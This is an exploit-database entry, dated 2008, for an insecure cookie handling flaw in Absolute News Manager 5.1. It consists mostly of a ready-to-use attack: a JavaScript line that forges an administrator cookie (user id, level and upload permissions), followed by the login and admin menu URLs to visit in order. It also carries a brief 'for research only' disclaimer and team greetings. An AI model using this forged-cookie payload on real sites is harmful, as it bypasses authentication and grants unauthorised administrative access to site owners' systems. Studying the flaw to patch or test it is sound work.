id: 3982
date: 10/31/2008
title: Absolute News Manager 5.1 Insecure Cookie Handling Vulnerability
author: Hakxer
cves: 

================================================================
Absolute News Manager 5.1 Insecure Cookie Handling Vulnerability
================================================================


The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!

#################################################################################
## Discovered by : Hakxer                                                       #
## Script : Absolute News Manager :http://www.xigla.com/absolutenmnet/demo.htm  #
## Greetz : Allah , Egyptian x Hacker , SQL_Inj4ct0r , Stealth , All my team    #
## Team : EgY Coders Team                                                       #
## ----------------------------Start Exploit----------------------------------- #
## First Go to http://www.xigla.com/absolutenmnet/demo/login.aspx
## Execute JS Code : javascript:document.cookie="xlaANMadmin_demo=usr=1&lvl=2&uniqueid=&permissions=upload,relate";
## Second Go to http://www.xigla.com/absolutenmnet/demo/menu.aspx
## _=END=_
#############################################################################



#  0day.today [2023-03-21]  #